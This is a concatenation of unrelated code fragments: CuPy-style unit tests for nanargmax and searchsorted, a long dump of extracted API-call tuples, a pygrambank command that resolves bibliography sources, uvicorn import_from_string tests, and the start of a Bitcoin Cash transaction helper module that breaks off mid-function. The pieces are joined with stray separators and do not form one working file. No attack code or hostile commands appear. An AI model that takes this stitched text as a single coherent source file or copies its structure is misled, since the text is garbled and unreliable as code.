class TestNanArgMax(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan2(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan3(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1, 1.0, -2.0], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan4(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan')],
dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan5(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan'), -1, 1],
dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmax_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmax_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
                xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return xp.nanargmax(a, axis=1)
@testing.gpu
@testing.parameterize(*testing.product(
{'bins': [
[],
[0, 1, 2, 4, 10],
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
[0.0, 1.0, 2.5, 4.0, 10.0],
[-1.0, 1.0, 2.5, 4.0, 20.0],
[1.5, 2.5, 4.0, 6.0],
[float('-inf'), 1.5, 2.5, 4.0, 6.0],
[1.5, 2.5, 4.0, 6.0, float('inf')],
[float('-inf'), 1.5, 2.5, 4.0, 6.0, float('inf')],
[0.0, 1.0, 1.0, 4.0, 4.0, 10.0],
[0.0, 1.0, 1.0, 4.0, 4.0, 4.0, 4.0, 10.0],
],
'side': ['left', 'right'],
'shape': [(), (10,), (6, 3, 3)]})
)
class TestSearchSorted(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_searchsorted(self, xp, dtype):
x = testing.shaped_arange(self.shape, xp, dtype)
bins = xp.array(self.bins)
y = xp.searchsorted(bins, x, side=self.side)
return y,
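# Note (added, not in the original tests): searchsorted returns the
# insertion indices that keep `bins` sorted; side='left' gives the index of
# the first equal element, side='right' one past the last, e.g.
#
#     numpy.searchsorted([1, 2, 2, 4], 2, side='left')     # -> 1
#     numpy.searchsorted([1, 2, 2, 4], 2, side='right')    # -> 3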
@testing.gpu
@testing.parameterize(
{'side': 'left'},
{'side': 'right'})
class TestSearchSortedNanInf(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_searchsorted_nanbins(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
bins = xp.array([0, 1, 2, 4, 10, float('nan')])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.numpy_cupy_array_equal()
def test_searchsorted_nan(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('nan')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
# DPNP_BUG
# Segmentation fault on access to negative index # x[-1] = float('nan') #######
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_nan_last(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([0, 1, 2, 4, float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_nan_last_repeat(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([0, 1, 2, float('nan'), float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_all_nans(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([float('nan'), float('nan'), float('nan'),
# float('nan'), float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
###############################################################################
@testing.numpy_cupy_array_equal()
def test_searchsorted_inf(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('inf')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.numpy_cupy_array_equal()
def test_searchsorted_minf(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('-inf')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.gpu
class TestSearchSortedInvalid(unittest.TestCase):
    # Can't test unordered bins because numpy's behavior for
    # searchsorted is undefined in that case
def test_searchsorted_ndbins(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((10,), xp, xp.float64)
bins = xp.array([[10, 4], [2, 1], [7, 8]])
with pytest.raises(ValueError):
xp.searchsorted(bins, x)
@testing.gpu
class TestSearchSortedWithSorter(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_sorter(self, xp):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([3, 2, 1, 4, 0])
y = xp.searchsorted(bins, x, sorter=sorter)
return y,
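    # Note (added, not in the original tests): the `sorter` argument is a
    # permutation that sorts `bins`; here bins[sorter] == [1, 2, 4, 8, 10],
    # so searchsorted effectively operates on that sorted view.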
def test_invalid_sorter(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([0])
with pytest.raises(ValueError):
xp.searchsorted(bins, x, sorter=sorter)
def test_nonint_sorter(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([], dtype=xp.float64)
with pytest.raises(TypeError):
xp.searchsorted(bins, x, sorter=sorter)
|
import testing\n'), ((3861, 3904), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (3882, 3904), False, 'from tests.third_party.cupy import testing\n'), ((4078, 4121), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4099, 4121), False, 'from tests.third_party.cupy import testing\n'), ((4291, 4334), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4312, 4334), False, 'from tests.third_party.cupy import testing\n'), ((4504, 4547), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4525, 4547), False, 'from tests.third_party.cupy import testing\n'), ((5445, 5485), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (5466, 5485), False, 'from tests.third_party.cupy import testing\n'), ((8077, 8126), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.shape', 'cupy', 'in_dtype'], {}), '(self.shape, cupy, in_dtype)\n', (8098, 8126), False, 'from tests.third_party.cupy import testing\n'), ((7677, 7779), 'tests.third_party.cupy.testing.product', 'testing.product', (["{'func': ['argmin', 'argmax'], 'is_module': [True, False], 'shape': [(3, 4),\n ()]}"], {}), "({'func': ['argmin', 'argmax'], 'is_module': [True, False],\n 'shape': [(3, 4), ()]})\n", (7692, 7779), False, 'from tests.third_party.cupy import testing\n'), ((8981, 9033), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'xp.bool_'], {}), '(self.cond_shape, xp, xp.bool_)\n', (9002, 9033), False, 'from tests.third_party.cupy import testing\n'), ((9252, 9307), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.x_shape', 'xp', 'x_type'], {'seed': '(0)'}), '(self.x_shape, xp, x_type, seed=0)\n', (9273, 9307), False, 'from tests.third_party.cupy import testing\n'), ((9320, 9375), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.y_shape', 'xp', 'y_type'], {'seed': '(1)'}), '(self.y_shape, xp, y_type, seed=1)\n', (9341, 9375), False, 'from tests.third_party.cupy import testing\n'), ((9731, 9783), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'xp.bool_'], {}), '(self.cond_shape, xp, xp.bool_)\n', (9752, 9783), False, 'from tests.third_party.cupy import testing\n'), ((10255, 10272), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), '((0,))\n', (10266, 10272), False, 'import numpy\n'), ((10289, 10308), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (10300, 10308), False, 'import numpy\n'), ((10325, 10347), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (10336, 10347), False, 'import numpy\n'), ((10633, 10647), 'numpy.array', 'numpy.array', (['(0)'], {}), '(0)\n', (10644, 10647), False, 'import numpy\n'), ((10664, 10678), 'numpy.array', 'numpy.array', (['(1)'], {}), '(1)\n', (10675, 10678), False, 'import numpy\n'), ((11065, 11079), 'numpy.array', 'numpy.array', (['(0)'], {}), '(0)\n', (11076, 11079), False, 'import numpy\n'), ((11096, 11110), 'numpy.array', 'numpy.array', (['(1)'], {}), '(1)\n', (11107, 11110), False, 'import numpy\n'), ((11127, 11144), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), 
'((0,))\n', (11138, 11144), False, 'import numpy\n'), ((11161, 11180), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (11172, 11180), False, 'import numpy\n'), ((11197, 11219), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (11208, 11219), False, 'import numpy\n'), ((11517, 11534), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), '((0,))\n', (11528, 11534), False, 'import numpy\n'), ((11551, 11570), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (11562, 11570), False, 'import numpy\n'), ((11587, 11609), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (11598, 11609), False, 'import numpy\n'), ((12544, 12584), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (12565, 12584), False, 'from tests.third_party.cupy import testing\n'), ((14058, 14101), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (14079, 14101), False, 'from tests.third_party.cupy import testing\n'), ((14281, 14324), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14302, 14324), False, 'from tests.third_party.cupy import testing\n'), ((14504, 14547), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14525, 14547), False, 'from tests.third_party.cupy import testing\n'), ((14727, 14770), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14748, 14770), False, 'from tests.third_party.cupy import testing\n'), ((15704, 15744), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15725, 15744), False, 'from tests.third_party.cupy import testing\n'), ((15977, 16017), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (15998, 16017), False, 'from tests.third_party.cupy import testing\n'), ((17491, 17534), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (17512, 17534), False, 'from tests.third_party.cupy import testing\n'), ((17714, 17757), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (17735, 17757), False, 'from tests.third_party.cupy import testing\n'), ((17937, 17980), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (17958, 17980), False, 'from tests.third_party.cupy import testing\n'), ((18160, 18203), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (18181, 18203), False, 'from tests.third_party.cupy import testing\n'), ((19137, 19177), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (19158, 19177), False, 'from tests.third_party.cupy import testing\n'), ((19975, 20019), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['self.shape', 'xp', 'dtype'], {}), '(self.shape, xp, dtype)\n', (19996, 20019), False, 'from 
tests.third_party.cupy import testing\n'), ((20354, 20398), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (20375, 20398), False, 'from tests.third_party.cupy import testing\n'), ((20618, 20662), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (20639, 20662), False, 'from tests.third_party.cupy import testing\n'), ((22063, 22107), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22084, 22107), False, 'from tests.third_party.cupy import testing\n'), ((22342, 22386), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22363, 22386), False, 'from tests.third_party.cupy import testing\n'), ((23106, 23150), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23127, 23150), False, 'from tests.third_party.cupy import testing\n'), ((2259, 2299), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (2280, 2299), False, 'from tests.third_party.cupy import testing\n'), ((2516, 2556), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (2537, 2556), False, 'from tests.third_party.cupy import testing\n'), ((4916, 4956), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (4937, 4956), False, 'from tests.third_party.cupy import testing\n'), ((5180, 5220), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (5201, 5220), False, 'from tests.third_party.cupy import testing\n'), ((9182, 9235), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'cond_type'], {}), '(self.cond_shape, xp, cond_type)\n', (9203, 9235), False, 'from tests.third_party.cupy import testing\n'), ((9799, 9848), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'dtype'], {}), '(self.cond_shape, xp, dtype)\n', (9820, 9848), False, 'from tests.third_party.cupy import testing\n'), ((10025, 10074), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 4)', 'xp'], {'dtype': 'xp.bool_'}), '((3, 4), xp, dtype=xp.bool_)\n', (10046, 10074), False, 'from tests.third_party.cupy import testing\n'), ((10091, 10137), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'xp.int32'], {}), '((2, 3, 4), xp, xp.int32)\n', (10112, 10137), False, 'from tests.third_party.cupy import testing\n'), ((15157, 15197), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15178, 15197), False, 'from tests.third_party.cupy import testing\n'), ((15422, 15462), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15443, 15462), False, 'from tests.third_party.cupy import testing\n'), ((18590, 18630), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], 
{}), '((0, 1), xp, dtype)\n', (18611, 18630), False, 'from tests.third_party.cupy import testing\n'), ((18855, 18895), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (18876, 18895), False, 'from tests.third_party.cupy import testing\n'), ((22771, 22815), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22792, 22815), False, 'from tests.third_party.cupy import testing\n'), ((23391, 23435), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23412, 23435), False, 'from tests.third_party.cupy import testing\n'), ((23701, 23745), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23722, 23745), False, 'from tests.third_party.cupy import testing\n'), ((2317, 2342), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2330, 2342), False, 'import pytest\n'), ((2574, 2599), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2587, 2599), False, 'import pytest\n'), ((4974, 4999), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (4987, 4999), False, 'import pytest\n'), ((5238, 5263), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5251, 5263), False, 'import pytest\n'), ((10155, 10180), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (10168, 10180), False, 'import pytest\n'), ((10957, 10990), 'pytest.raises', 'pytest.raises', (['DeprecationWarning'], {}), '(DeprecationWarning)\n', (10970, 10990), False, 'import pytest\n'), ((15215, 15240), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (15228, 15240), False, 'import pytest\n'), ((15480, 15505), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (15493, 15505), False, 'import pytest\n'), ((18648, 18673), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (18661, 18673), False, 'import pytest\n'), ((18913, 18938), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (18926, 18938), False, 'import pytest\n'), ((22888, 22913), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (22901, 22913), False, 'import pytest\n'), ((23534, 23559), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (23547, 23559), False, 'import pytest\n'), ((23861, 23885), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (23874, 23885), False, 'import pytest\n')]
|
"""
Lookup the references given in the `Source` column of a sheet in Glottolog hh.bib or the Grambank bib.
"""
import pathlib
import collections
from termcolor import colored
from cldfcatalog import Catalog
from pygrambank.sheet import Sheet
from pygrambank.cldf import refs
def register(parser):
parser.add_argument(
'glottolog',
metavar='GLOTTOLOG',
help="clone of glottolog/glottolog",
type=pathlib.Path,
)
parser.add_argument(
'sheet',
type=pathlib.Path,
)
parser.add_argument(
'--glottolog-version',
default=None,
help="tag to checkout glottolog/glottolog to",
)
def run(args):
if args.glottolog_version: # pragma: no cover
with Catalog(args.glottolog, args.glottolog_version) as glottolog:
run_(args, glottolog.dir)
else: # pragma: no cover
run_(args, args.glottolog)
def run_(args, glottolog): # pragma: no cover
sources, unresolved, lgks = refs(args.repos, glottolog, Sheet(args.sheet))
seen = collections.defaultdict(list)
print(colored('Resolved sources:', attrs=['bold']))
for src in sources:
seen[src.id].append(src)
for srcid, srcs in seen.items():
print('{}\t{}\t{}'.format(len(srcs), srcid, srcs[0]))
if unresolved:
print()
print(colored('Unresolved sources:', attrs=['bold']))
for spec, v in unresolved.most_common():
try:
author, year, code = spec
print('{}\t{} {}'.format(v, author, year))
except ValueError:
print(spec)
if lgks:
print()
print(colored('Available sources:', attrs=['bold']))
for (k, t, a, y) in lgks:
print('{}\t{}\t{}'.format(
colored(k, color='blue'),
t,
colored('{} {}'.format(a, y), attrs=['bold'])))
print()
print(colored('FAIL' if unresolved else 'OK', color='red' if unresolved else 'green'))
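# Invocation sketch -- the subcommand name is derived from this module's filename
# by pygrambank's CLI machinery, and the paths below are hypothetical:
#   grambank <this-command> ./glottolog sheets/ABC_abcd1234.tsv --glottolog-version v4.4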
|
[
"collections.defaultdict",
"termcolor.colored",
"pygrambank.sheet.Sheet",
"cldfcatalog.Catalog"
] |
[((1053, 1082), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (1076, 1082), False, 'import collections\n'), ((1023, 1040), 'pygrambank.sheet.Sheet', 'Sheet', (['args.sheet'], {}), '(args.sheet)\n', (1028, 1040), False, 'from pygrambank.sheet import Sheet\n'), ((1093, 1137), 'termcolor.colored', 'colored', (['"""Resolved sources:"""'], {'attrs': "['bold']"}), "('Resolved sources:', attrs=['bold'])\n", (1100, 1137), False, 'from termcolor import colored\n'), ((1960, 2039), 'termcolor.colored', 'colored', (["('FAIL' if unresolved else 'OK')"], {'color': "('red' if unresolved else 'green')"}), "('FAIL' if unresolved else 'OK', color='red' if unresolved else 'green')\n", (1967, 2039), False, 'from termcolor import colored\n'), ((749, 796), 'cldfcatalog.Catalog', 'Catalog', (['args.glottolog', 'args.glottolog_version'], {}), '(args.glottolog, args.glottolog_version)\n', (756, 796), False, 'from cldfcatalog import Catalog\n'), ((1344, 1390), 'termcolor.colored', 'colored', (['"""Unresolved sources:"""'], {'attrs': "['bold']"}), "('Unresolved sources:', attrs=['bold'])\n", (1351, 1390), False, 'from termcolor import colored\n'), ((1673, 1718), 'termcolor.colored', 'colored', (['"""Available sources:"""'], {'attrs': "['bold']"}), "('Available sources:', attrs=['bold'])\n", (1680, 1718), False, 'from termcolor import colored\n'), ((1821, 1845), 'termcolor.colored', 'colored', (['k'], {'color': '"""blue"""'}), "(k, color='blue')\n", (1828, 1845), False, 'from termcolor import colored\n')]
|
import pytest
from uvicorn.importer import ImportFromStringError, import_from_string
def test_invalid_format() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("example:")
expected = 'Import string "example:" must be in format "<module>:<attribute>".'
assert expected in str(exc_info.value)
def test_invalid_module() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("module_does_not_exist:myattr")
expected = 'Could not import module "module_does_not_exist".'
assert expected in str(exc_info.value)
def test_invalid_attr() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("tempfile:attr_does_not_exist")
expected = 'Attribute "attr_does_not_exist" not found in module "tempfile".'
assert expected in str(exc_info.value)
def test_internal_import_error() -> None:
with pytest.raises(ImportError):
import_from_string("tests.importer.raise_import_error:myattr")
def test_valid_import() -> None:
instance = import_from_string("tempfile:TemporaryFile")
from tempfile import TemporaryFile
assert instance == TemporaryFile
def test_no_import_needed() -> None:
from tempfile import TemporaryFile
instance = import_from_string(TemporaryFile)
assert instance == TemporaryFile
|
[
"pytest.raises",
"uvicorn.importer.import_from_string"
] |
[((1091, 1135), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tempfile:TemporaryFile"""'], {}), "('tempfile:TemporaryFile')\n", (1109, 1135), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((1307, 1340), 'uvicorn.importer.import_from_string', 'import_from_string', (['TemporaryFile'], {}), '(TemporaryFile)\n', (1325, 1340), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((132, 168), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (145, 168), False, 'import pytest\n'), ((190, 220), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""example:"""'], {}), "('example:')\n", (208, 220), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((394, 430), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (407, 430), False, 'import pytest\n'), ((452, 502), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""module_does_not_exist:myattr"""'], {}), "('module_does_not_exist:myattr')\n", (470, 502), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((656, 692), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (669, 692), False, 'import pytest\n'), ((714, 764), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tempfile:attr_does_not_exist"""'], {}), "('tempfile:attr_does_not_exist')\n", (732, 764), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((942, 968), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (955, 968), False, 'import pytest\n'), ((978, 1040), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tests.importer.raise_import_error:myattr"""'], {}), "('tests.importer.raise_import_error:myattr')\n", (996, 1040), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n')]
|
"""
Minimal bitcoin cash transaction stuff for making weird smart contracts
"""
from collections import namedtuple
import struct
import hashlib
from itertools import chain
### Transactions stuff
zero32 = b'\0'*32
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_FORKID = 0x40
SIGHASH_ANYONECANPAY = 0x80
default_hashtype = SIGHASH_ALL|SIGHASH_FORKID
def sha256(b):
return hashlib.sha256(b).digest()
def rip160(b):
ripemd = hashlib.new('ripemd160')
ripemd.update(b)
return ripemd.digest()
def hash160(b):
return rip160(sha256(b))
def hash256(b):
return sha256(sha256(b))
# Convert python int to 1,2,4,8-byte little endian unsigned integers.
# Input range is checked.
# These are the fastest way I know of (better than calling bytes() or using int.to_bytes).
int_to_ubyte = struct.Struct('B').pack
int_to_ule2 = struct.Struct('<H').pack
int_to_ule4 = struct.Struct('<L').pack
int_to_ule8 = struct.Struct('<Q').pack
# These functions take in bytes, offset and return (integer, new_offset)
def structreader1(format):
s = struct.Struct(format)
slen = s.size
sunp = s.unpack_from
del s, format
def fun(b, offset):
data, = sunp(b, offset)
return data, offset+slen
return fun
read_ubyte = structreader1( 'B')
read_ule2 = structreader1('<H')
read_ule4 = structreader1('<L')
read_ule8 = structreader1('<Q')
def read_nbytes(b, n, offset):
new_offset = offset+n
res = bytes(b[offset : new_offset])
if len(res) != n:
raise struct.error("too few bytes")
return res, new_offset
def var_int(i):
"""Return bytes representation of bitcoin's variable length integers.
They are sometimes used for counters, sometimes used for byte lengths.
https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
"""
i = int(i)
if i<0xfd:
return bytes((i,))
elif i<=0xffff:
return b"\xfd"+int_to_ule2(i)
elif i<=0xffffffff:
return b"\xfe"+int_to_ule4(i)
else:
return b"\xff"+int_to_ule8(i)
def read_var_int(mv, offset):
""" Read var_int from offset and return new offset. """
